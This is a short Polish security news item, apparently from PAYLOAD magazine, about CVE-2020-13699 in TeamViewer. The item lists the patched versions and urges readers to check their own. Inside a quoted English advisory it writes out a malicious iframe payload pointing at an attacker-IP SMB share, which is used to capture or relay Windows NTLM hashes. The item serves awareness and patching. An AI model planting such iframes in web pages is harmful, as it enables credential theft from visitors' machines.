Ujawniony kilkanaście dni temu błąd CVE-2020-13699 pozwala wykraść hash hasła systemowego do Windows dzięki TeamViewera starszego niż 15.8.3. A Ty jaką masz wersję na swoim komputerze?
Poniższy cytat pochodzi ze strony https://meterpreter.org/cve-2020-13699-teamviewer-unquoted-uri-handler-vulnerability-alert/:
An attacker could embed a malicious iframe in a website with a crafted URL (<iframe src=’teamviewer10: -play \attacker-IP\share\fake.tvs’>) that would launch the TeamViewer Windows desktop client and force it to open a remote SMB share. Windows will perform NTLM authentication when opening the SMB share and that request can be relayed (using a tool like responder) for code execution (or captured for hash cracking). This affects the URI handlers teamviewer10, teamviewer8, teamviewerapi, tvchat1, tvcontrol1, tvfiletransfer1, tvjoinv8, vpresent1, tvsendfile1, tvsqcustomer1, tvsqsupport1, tvvideocall1, and tvvpn1. This issue was remediated by quoting the parameters passed by the aforementioned URI handlers e.g. URL:teamviewer10 Protocol “C:\Program Files (x86)\TeamViewer\TeamViewer.exe" “%1"
Na tej stronie znajdziesz gotowy exploit (w formie merge requesta do frameworka Metasploit) oraz praktyczną instrukcję jego wykorzystania.
Błąd został poprawiony w wersjach 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350 i 15.8.3.
Nie zezwala się na użycie treści prezentowanych w magazynie PAYLOAD, ani produktów dostępnych w sklepie PAYLOAD, do celów popełniania przestępstw lub przestępstw skarbowych.